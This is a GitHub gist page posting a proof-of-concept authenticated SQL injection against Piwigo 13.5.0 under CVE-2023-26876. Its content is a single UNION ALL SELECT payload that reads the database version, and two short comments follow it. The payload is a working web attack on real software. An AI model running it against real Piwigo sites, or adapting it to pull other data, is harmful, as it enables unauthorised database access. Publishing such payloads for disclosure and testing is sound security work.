Skip to content

Instantly share code, notes, and snippets.

@rodnt
Created April 18, 2023 14:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rodnt/a190d14d1715890d8df19bad58b90693 to your computer and use it in GitHub Desktop.
Save rodnt/a190d14d1715890d8df19bad58b90693 to your computer and use it in GitHub Desktop.
POC - Authenticated SQL injection Piwigo 13.5.0 - CVE-2023-26876

POC - Authenticated SQL injection Piwigo 13.5.0

Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --

@rodnt
Copy link
Author

rodnt commented Apr 18, 2023

sqli-piwigo

@ajakk
Copy link

ajakk commented Apr 24, 2023

So where's the upstream report?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment